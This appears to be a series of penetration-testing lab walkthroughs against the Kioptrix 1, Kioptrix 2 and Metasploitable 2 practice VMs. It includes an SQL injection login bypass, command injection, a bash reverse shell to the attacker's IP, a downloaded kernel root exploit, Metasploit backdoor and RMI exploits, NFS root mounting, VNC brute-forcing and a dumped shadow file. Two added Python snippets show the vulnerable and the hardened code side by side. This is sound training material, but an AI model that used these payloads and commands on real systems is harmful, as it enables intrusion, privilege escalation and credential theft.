Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series, which can be found here. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want to get the OSCP certification.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Let's get started!

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM at 192.168.182.152.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on ports 80/tcp and 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It's probable that this web server has a back-end SQL database, which might be vulnerable to SQL injection.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform an SQL injection.

I tested the login form with ' or '1'='1 and it worked.

It probably worked because the application's SQL statement is along the lines of:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying ' or '1'='1 as both the username and the password turns the SQL statement into:

 SELECT * FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because '1'='1' is always true, the WHERE clause matches every row, so this SELECT statement logs us in and returns the first user in the users table.
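To show exactly why the payload works and what the fix looks like, here is an added example (not code from the original post or from the Kioptrix application): a toy sqlite3 user table queried once with the string-interpolated statement described above and once with bound parameters. The table contents and the plaintext password column are constructed simplifications.

```python
import sqlite3

# Constructed toy user table standing in for the web app's database.
# Real applications store password hashes, never plaintext; kept simple here.
USERS = [("admin", "s3cret"), ("john", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    # The pattern the post describes: user input pasted straight into SQL text.
    return (f"SELECT * FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(conn, username, password):
    """Return the username the app would 'log in' as, or None.

    Any non-empty result counts as success, so a WHERE clause that matches
    every row logs the attacker in as the first user in the table."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    # Hardened form: bound parameters. The quote characters in the payload stay
    # inside the string value and are never parsed as SQL syntax.
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The tautology payload from the walkthrough.
PAYLOAD = "' or '1'='1"
```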

So now we have a ping command prompt, which might be vulnerable to command injection. Using the input ; id I confirmed that the application was vulnerable to command injection, so I also tried to get the usernames and passwords on the server. I was able to read /etc/passwd but did not have access to /etc/shadow.
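The same flaw in code, as an added example that is not part of the original post: a ping wrapper that pastes the submitted host into a shell command line, beside a hardened version that allow-lists the input as an IP address and runs the program without a shell. echo stands in for ping so the example runs offline.

```python
import ipaddress
import subprocess


def vulnerable_ping(host):
    # Mirrors the web console's mistake: the submitted host is pasted into a
    # shell command line. 'echo' stands in for ping so this runs offline; a
    # shell metacharacter such as ';' ends the echo and starts a second command.
    return subprocess.run(f"echo PING {host}", shell=True,
                          capture_output=True, text=True).stdout


def is_valid_target(host):
    # Allow-list validation: the field must parse as an IPv4 or IPv6 address.
    # Anything else (hostnames, metacharacters, extra arguments) is rejected.
    try:
        ipaddress.ip_address(host.strip())
        return True
    except ValueError:
        return False


def safe_ping(host):
    # Hardened form: validate first, then pass argv directly with no shell, so
    # the value is only ever an argument and never interpreted as syntax.
    if not is_valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return subprocess.run(["echo", "PING", host.strip()],
                          capture_output=True, text=True).stdout
```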

Knowing that the application is vulnerable to command injection, I took it a step further and tried to get a reverse shell.
I used netcat (nc) to set up a listener to catch the reverse shell.

root@kali:~# nc -nvlp 443

Then I went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1


I successfully got a reverse shell as the apache user. Next I will try to escalate privileges to the root account.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

The server is running CentOS release 4.5, which after some research I found to be vulnerable to the ‘ip_append_data()’ Ring0 privilege escalation exploit.

On the shell we just obtained, I used wget to download the exploit onto the server.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I compiled the program and ran the exploit to get the root shell.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

Kioptrix Level 1 is the first in the series of five. The point of the game is to get a root shell on the vulnerable machine. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want to get the OSCP certification. More info from the author is listed below, with the link to download the VM here.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Without further ado, let's get started.

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim at the IP address 192.168.182.151.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, rpcbind on port 111, and Samba smbd on port 139.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

I used nbtscan to scan for NetBIOS information.

I did a simple SMB enumeration with the enum4linux tool and found that the victim is running Samba 2.2.1a, which is vulnerable to the Samba trans2open overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability, taken from Rapid7's Vulnerability & Exploit Database, is listed below. I used the Metasploit module exploit/linux/samba/trans2open to exploit it.

Description: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting a root shell I found the flag in /var/spool/mail, which said:
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”

Well, that's it for level 1. It will only get harder from here. Next is Level 2.

Metasploitable is a virtual machine that was intentionally built to be vulnerable so that you can try out penetration testing tools and common techniques against it. I will go through the five phases of a penetration test (except reconnaissance) and talk about some of the tools and types of exploits I used. Granted, Metasploitable 2 has many other vulnerabilities, but I will only cover a few, which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

 192.168.182.147 

Metasploitable 2

 192.168.182.150 

Scanning and Enumeration

Scanning with nmap

Using nmap to do a version scan with OS detection shows each open port, the service on it and that service's version. According to nmap the OS is Linux 2.6.X.

root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST
Nmap scan report for 192.168.182.150
Host is up (0.012s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37131/tcp open  nlockmgr    1-4 (RPC #100021)
38108/tcp open  unknown
53107/tcp open  mountd      1-3 (RPC #100005)
54247/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:13:C8:C2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Banner grabbing (port 23)

This was very interesting! I was able to find username and password credentials (msfadmin/msfadmin) just by a simple banner grab using telnet.

root@kali:~# telnet 192.168.182.150
Trying 192.168.182.150...
Connected to 192.168.182.150.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: 

Banner grabbing the web server

Using netcat we found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). Opening http://192.168.182.150 in my web browser, I also found applications such as Damn Vulnerable Web App, Mutillidae, phpMyAdmin, a wiki, and WebDAV running on the victim machine, along with the username msfadmin and password msfadmin to log in with.


VNC on port 5900

In the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it, but it requires a password. I will brute-force my way in later in this pentest.

root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Reading password failed
root@kali:~# 

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap, Metasploitable is running vsftpd 2.3.4. In 2011 a backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011, and it was removed on July 3rd 2011. We are going to check whether this server contains the backdoor: enter any username you like with “:)” appended, and use anything for the password. If the backdoor is present, it triggers without valid credentials. The login hangs after the password prompt, which tells us that the FTP server is still processing the login attempt; connecting to port 6200 with netcat then gives a root shell, which confirms the backdoor is present. The Metasploit Framework also has a module for this exploit, located here.

root@kali:~# ftp 192.168.182.150
Connected to 192.168.182.150.
220 (vsFTPd 2.3.4)
Name (192.168.182.150:root): backdoor:)
331 Please specify the password.
Password:
root@kali:~# nc 192.168.182.150 6200
whoami
root
id
uid=0(root) gid=0(root)
ls -l
total 85
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13800 Feb  4 00:27 dev
drwxr-xr-x  95 root root  4096 Feb  4 00:30 etc
drwxr-xr-x   6 root root  4096 Apr 16  2010 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 10147 Feb  4 00:30 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 108 root root     0 Feb  4 00:27 proc
drwxr-xr-x  13 root root  4096 Feb  4 00:30 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Feb  4 00:27 sys
drwxrwxrwt   4 root root  4096 Feb  4 00:30 tmp
drwxr-xr-x  12 root root  4096 Apr 27  2010 usr
drwxr-xr-x  15 root root  4096 May 20  2012 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)

Searching for a Java exploit, I stumbled across this one on the Rapid7 Vulnerability & Exploit Database.

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

I used Metasploit, loaded the module exploit/multi/misc/java_rmi_server and set the options to run the exploit. What's a bit different here is that I set the payload to java/meterpreter/reverse_tcp before running the exploit.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      192.168.182.150  yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw
[*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw
[*] Server started.
[*] 192.168.182.150:1099 - Sending RMI Header...
[*] 192.168.182.150:1099 - Sending RMI Call...
[*] 192.168.182.150  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.182.150
[*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Ingreslock (Port 1524)

The ingreslock port is used to lock parts of an Ingres database; however, it is also a port commonly used by trojans as a backdoor into a system. A simple netcat connection is all we need to exploit this.

root@kali:~# nc 192.168.182.150 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# 

NFS Share misconfiguration (Port 2049)

NFS (Network File System) is a Unix service used to share files across the network. System administrators need to configure it carefully, because a misconfiguration can expose the whole host, as shown here. The nmap scan showed NFS running on port 2049, and the command showmount -e 192.168.182.150 revealed that the root directory was being shared! Naturally, I went on to exploit this misconfiguration, as shown below.

Showing NFS server’s export list

root@kali:~# showmount -e 192.168.182.150
Export list for 192.168.182.150:
/ *
root@kali:~# 

I made a mount point so that I could view all the contents of the server, and ran df -h to show that the server's root directory is mounted. In the post-exploitation phase I will add an SSH key to the server's authorized_keys file; more on that later in this guide.

root@kali:~# mkdir /temp/root_access2Metaploitable/
root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock
root@kali:~# df -h
Filesystem         Size  Used Avail Use% Mounted on
udev                10M     0   10M   0% /dev
tmpfs              1.6G  9.1M  1.6G   1% /run
/dev/sda1           57G   17G   38G  31% /
tmpfs              3.9G  212K  3.9G   1% /dev/shm
tmpfs              5.0M     0  5.0M   0% /run/lock
tmpfs              3.9G     0  3.9G   0% /sys/fs/cgroup
tmpfs              798M  8.0K  798M   1% /run/user/132
tmpfs              798M   12K  798M   1% /run/user/0
/dev/sr0           3.1G  3.1G     0 100% /media/cdrom0
192.168.182.150:/  7.0G  1.5G  5.2G  22% /temp/root_access2Metaploitable

Brute-forcing VNC Login Credentials (Port 5900)

Using Metasploit's auxiliary module auxiliary/scanner/vnc/vnc_login, I brute-forced the victim and got the password “password”. With this I was able to run vncviewer again with the correct credentials and get not only a GUI but also a root shell on the system!

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150
RHOSTS => 192.168.182.150
msf auxiliary(vnc_login) > run

[*] 192.168.182.150:5900 - Starting VNC login sweep
[!] No active DB -- Credential data will not be saved!
[+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_login) > 
root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Let's use the Metasploit Framework module exploit/unix/irc/unreal_ircd_3281_backdoor to exploit it.

root@kali:~# msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] Connected to 192.168.182.150:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ce3SW1J9SQ4K3cOX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ce3SW1J9SQ4K3cOX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600

id
uid=0(root) gid=0(root)
whoami
root

Post Exploitation

Getting the usernames and passwords from the Victim

With a root shell you can use the cat command to display the contents of /etc/shadow, which holds the password hash for each username. Looking at the hashes, the $1$ prefix tells you that these are MD5(Unix) (md5crypt) passwords.

root@metasploitable:/# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
